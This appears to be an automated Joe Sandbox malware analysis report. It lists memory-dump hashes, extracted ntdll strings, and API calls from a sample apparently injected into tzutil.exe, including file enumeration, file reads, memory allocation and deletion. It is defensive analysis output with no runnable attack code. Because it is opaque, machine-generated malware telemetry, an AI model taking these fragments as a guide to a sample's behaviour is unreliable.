                                                              • Instruction Fuzzy Hash: F490022522180002014DB598070850B0485A7D6351395C015F1417590CC72189655321
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6b68c01f4f83f05f8004035264f4cfaebd4c186bfa29f2ad4b0f429b34bcc587
                                                              • Instruction ID: d2ffe2867bc989f7ce930014824aee870392891ebeef5b6cf548b49fb37cda9d
                                                              • Opcode Fuzzy Hash: 6b68c01f4f83f05f8004035264f4cfaebd4c186bfa29f2ad4b0f429b34bcc587
                                                              • Instruction Fuzzy Hash: BE90022921380002D1887198550C60A004597D1202F95D415A0016558CCA1589695321
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3af425ba0302a94339e0f95b0d0ca922a24a4019975001e157993792bdd5d546
                                                              • Instruction ID: 4c6b1097c2bb301dde9e91e03a8f5a3d568a04b1e68d524a82b9766fe612abf8
                                                              • Opcode Fuzzy Hash: 3af425ba0302a94339e0f95b0d0ca922a24a4019975001e157993792bdd5d546
                                                              • Instruction Fuzzy Hash: 9090022120584442D1087598550CA06004597D0205F55D011A1065595DC7358951A231
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07ef635aedc8e648da3ceb07be621c82c3465ed0980f47dcc449d16a80074c0c
                                                              • Instruction ID: f77514b7ef4023790c364501a8da4b9eff0d7e5763ce42a5aedfde9f792595e1
                                                              • Opcode Fuzzy Hash: 07ef635aedc8e648da3ceb07be621c82c3465ed0980f47dcc449d16a80074c0c
                                                              • Instruction Fuzzy Hash: 8090022130180003D1487198551C6064045E7E1301F55D011E0415554CDA1589565322
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb74a8bd168d292c57a8b07006dff82433ae2371d072ad0aca43548e28c26d08
                                                              • Instruction ID: 13a8364349f292753c87cbadf44b124f66b1697b466f567d32f3fc90a5df3111
                                                              • Opcode Fuzzy Hash: cb74a8bd168d292c57a8b07006dff82433ae2371d072ad0aca43548e28c26d08
                                                              • Instruction Fuzzy Hash: 5090023124180402D149719845086060049A7D0241F95C012A0425554EC7558B56AB61
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cebc4e3422bfd9785ac915549600f03668494728c6a6c698ef9f71d1c18e872
                                                              • Instruction ID: 3539b804745fa4828b380eb1ee31de2ff2914e9c91fbc2153d36b7d174d3c8fb
                                                              • Opcode Fuzzy Hash: 8cebc4e3422bfd9785ac915549600f03668494728c6a6c698ef9f71d1c18e872
                                                              • Instruction Fuzzy Hash: F290022124284152554DB19845085074046A7E0241795C012A1415950CC6269956D721
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd57ea7ac503e83a05cf2fb7896613ba2c3c28bcf3346be3f3a63ad19290ecac
                                                              • Instruction ID: 1644354527c2ea887d56ada719327e1ba6e66e2b31448df3b3c0ae11bf20690e
                                                              • Opcode Fuzzy Hash: bd57ea7ac503e83a05cf2fb7896613ba2c3c28bcf3346be3f3a63ad19290ecac
                                                              • Instruction Fuzzy Hash: 6390023120180842D10871984508B46004597E0301F55C016A0125654DC715C9517621
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b831edad395427ad9f447c347a57a0b5f44cf9f8b52ce1f170e43cbe2abd2c7
                                                              • Instruction ID: fb8fa8607b7b114d80ff6312a96f88366b1198637958024a1720ea19d679869f
                                                              • Opcode Fuzzy Hash: 4b831edad395427ad9f447c347a57a0b5f44cf9f8b52ce1f170e43cbe2abd2c7
                                                              • Instruction Fuzzy Hash: 5090023120180402D10875D8550C646004597E0301F55D011A5025555EC76589916231
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3dbafc63ac7908dbac18aee1edb3c48062613201fab858f2b82e198ead9dc4ba
                                                              • Instruction ID: ef0efc1298472ca8f883f781e83270eb39cebe98a4ba87411213d7e787ae7e5c
                                                              • Opcode Fuzzy Hash: 3dbafc63ac7908dbac18aee1edb3c48062613201fab858f2b82e198ead9dc4ba
                                                              • Instruction Fuzzy Hash: F490022160580402D1487198551C706005597D0201F55D011A0025554DC7598B5567A1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39ba1cef4b2b40a763660e2f58daa946dc58ea083317cd03133ee342b53552e6
                                                              • Instruction ID: 7d1e979c6b82f22c3bd9a87914f03a8aa19f7bb5acdeb9d427498a1ab4ee064c
                                                              • Opcode Fuzzy Hash: 39ba1cef4b2b40a763660e2f58daa946dc58ea083317cd03133ee342b53552e6
                                                              • Instruction Fuzzy Hash: 1590023120180403D1087198560C707004597D0201F55D411A0425558DD75689516221
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 135c85dfe9b70f0245443b2cc55ae00988dc8f54d350bb375c7ab578b7e475bc
                                                              • Instruction ID: ebe13ae3f57f1dd4ac244fe0d4086b5a1315b29770ada96c886d21bc3cd87fcf
                                                              • Opcode Fuzzy Hash: 135c85dfe9b70f0245443b2cc55ae00988dc8f54d350bb375c7ab578b7e475bc
                                                              • Instruction Fuzzy Hash: 9A90026134180442D10871984518B060045D7E1301F55C015E1065554DC719CD526226
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff5e8fabbd5fd853444d616aac9e19d87cb8f4fbc90d8f3ef1051f1a8cbae396
                                                              • Instruction ID: 2b210da731a15f328f80484413f597581099822c4b2d8309df3b1cbd26a30a89
                                                              • Opcode Fuzzy Hash: ff5e8fabbd5fd853444d616aac9e19d87cb8f4fbc90d8f3ef1051f1a8cbae396
                                                              • Instruction Fuzzy Hash: 4390026121180042D10C71984508706008597E1201F55C012A2155554CC6298D615225
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f9e3d6f81d8e87356a00c8b90b6bf48d71c18f944059e4856a824cdad353f3c
                                                              • Instruction ID: df67a8cf0d748e57b16b045f2e758f74e251a04ec1c5b8c7d5aaa70907d96ab0
                                                              • Opcode Fuzzy Hash: 3f9e3d6f81d8e87356a00c8b90b6bf48d71c18f944059e4856a824cdad353f3c
                                                              • Instruction Fuzzy Hash: 3A900231201C0402D1087198491870B004597D0302F55C011A1165555DC72589516671
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: caaa61aa11ca48b157e18b5356ed95207fca8761aeac448bae329ce84177d2c6
                                                              • Instruction ID: 495bb00021864fa2170a1d47b614d92b019b5f801e10afacb14d89e738cdd126
                                                              • Opcode Fuzzy Hash: caaa61aa11ca48b157e18b5356ed95207fca8761aeac448bae329ce84177d2c6
                                                              • Instruction Fuzzy Hash: 1C90022160180042414871A889489064045BBE1211755C121A0999550DC65989655765
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a5b0c115850fcc7ab22716bbcfc702df2fd6f119083cd70c5a8f63b261f9be47
                                                              • Instruction ID: a1c1f60f33f1ffcf1ca147c604938e10553e69691b652e0dd43be43a344c4b35
                                                              • Opcode Fuzzy Hash: a5b0c115850fcc7ab22716bbcfc702df2fd6f119083cd70c5a8f63b261f9be47
                                                              • Instruction Fuzzy Hash: 91900231201C0402D1087198490C747004597D0302F55C011A5165555EC765C9916631
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 635633da6835d42addfdb0b611588fec3d3be2ad50c42b39f39a287d3d6dbaaa
                                                              • Instruction ID: 85a4ed8d779833043c9c8dbbfd17bd57b8b849411b727b7293c6bafe2f2c335c
                                                              • Opcode Fuzzy Hash: 635633da6835d42addfdb0b611588fec3d3be2ad50c42b39f39a287d3d6dbaaa
                                                              • Instruction Fuzzy Hash: 3A900221211C0042D20875A84D18B07004597D0303F55C115A0155554CCA1589615621
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1ebafc4ffb79dbcfe3c67cdee1c1c1c2485850dd2e0b64395d481fb9d8f2840
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              Strings
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 012046FC
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01204655
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01204787
                                                              • ExecuteOptions, xrefs: 012046A0
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01204742
                                                              • Execute=1, xrefs: 01204713
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01204725
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              Strings
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012002BD
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012002E7
                                                              • RTL: Re-Waiting, xrefs: 0120031E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              Strings
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01207B7F
                                                              • RTL: Resource at %p, xrefs: 01207B8E
                                                              • RTL: Re-Waiting, xrefs: 01207BAC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0120728C
                                                              Strings
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01207294
                                                              • RTL: Resource at %p, xrefs: 012072A3
                                                              • RTL: Re-Waiting, xrefs: 012072C1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0121CFBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID: @$@4_w@4_w
                                                              • API String ID: 4062629308-713214301

                                                              Execution Graph

                                                              Execution Coverage:2.4%
                                                              Dynamic/Decrypted Code Coverage:4.3%
                                                              Signature Coverage:2.3%
                                                              Total number of Nodes:439
                                                              Total number of Limit Nodes:71

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ".$'$-q$.j$1G$4U$7$9$@<$B0$Ng$T_$[_$dr$n$o$tp$u$z$R$i
                                                              • API String ID: 0-3230942322
                                                              • Opcode ID: 565d49982be5d2fecd96f2312bcf1fb6285dfecf25d0133e7957dac8d74b5b7a
                                                              • Instruction ID: 71bdc31d0fbda34ae5f94fd0915ed53cf544d5e2eb7a3ceac4c508915eea6bdc
                                                              • Opcode Fuzzy Hash: 565d49982be5d2fecd96f2312bcf1fb6285dfecf25d0133e7957dac8d74b5b7a
                                                              • Instruction Fuzzy Hash: 9432C0B0E0562DCFEB24CF44C894BDDBBB1BB56308F5081D9D04A6B280C7B95A89CF56
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 00ABCAB1
                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 00ABCAEE
                                                              • FindClose.KERNELBASE(?), ref: 00ABCAF9
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 3541575487-0
                                                              • Opcode ID: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                              • Instruction ID: 029b9a7561792010b503614459de7d6d7114c9038543ef20e4712cf79a645c62
                                                              • Opcode Fuzzy Hash: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                              • Instruction Fuzzy Hash: D23170B29003087BDB20DFA4CD86FEF77BD9F44755F14455CB949AB181DBB0AA848BA0
                                                              APIs
                                                              • NtCreateFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?,?,?), ref: 00AC957B
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                              • Instruction ID: 91153756f05a3252443c363c9663812ae60cb157ab7251fc4136fb25c3a0a039
                                                              • Opcode Fuzzy Hash: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                              • Instruction Fuzzy Hash: 5D31CDB5A01248AFCB54DF98D981EEEB7F9AF88704F108219F909A7340D734A951CBA5
                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?), ref: 00AC96D6
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                              • Instruction ID: c80b4028cc00d84493b5f1e6f379d7005f372e303a025ae6d03a267e96450b7c
                                                              • Opcode Fuzzy Hash: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                              • Instruction Fuzzy Hash: 3831D4B5A00208AFCB14DF98D981EEFB7F9EF8D704F118209F958A7240D734A911CBA5
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00AB21AE,?,5BC7A5B0,00000000,00000004,00003000,?,?,?,?,?,00AC82FF,00AB21AE), ref: 00AC99A8
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                              • Instruction ID: de06201efa7c3122d978050c3dab34b4f3ee1b819c17dec1427061b5d05c8ec1
                                                              • Opcode Fuzzy Hash: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                              • Instruction Fuzzy Hash: E72119B5A00249ABDB10DF98DD41FEFB7B9EF89704F10410DF949AB240D774A9118BA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteFile
                                                              • String ID:
                                                              • API String ID: 4033686569-0
                                                              • Opcode ID: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                              • Instruction ID: 46a1dec817287b0b2a10c33354c51832a2ff24eeaf024d8daab42e7acc2afb8d
                                                              • Opcode Fuzzy Hash: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                              • Instruction Fuzzy Hash: DE117071A013087BD660EB58DD46FABB7ACEF85704F10410DF9486B281DB7579058BA6
                                                              APIs
                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00AC97B1
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                              • Instruction ID: db69a2030042338c681e668d3ed26bbd6e7fa17e4dadac906c03269fc654ecb2
                                                              • Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                              • Instruction Fuzzy Hash: B0E08C76201604BBD220FA59DC02F9BBBACEFC6714F018019FA48A7281C671B9148BF1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b7efe614ffa0f718faa28e042a5bda6a11ba62bff9a8244dc480473637de6501
                                                              • Instruction ID: a3ecb1115e92992c5fbb536f0788e94df2d341c92a30c67d3e57867b7125bc98
                                                              • Opcode Fuzzy Hash: b7efe614ffa0f718faa28e042a5bda6a11ba62bff9a8244dc480473637de6501
                                                              • Instruction Fuzzy Hash: 2A900235A15814129140B15C48C4546400597E0701B55C011E0424958C8B248A565361
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
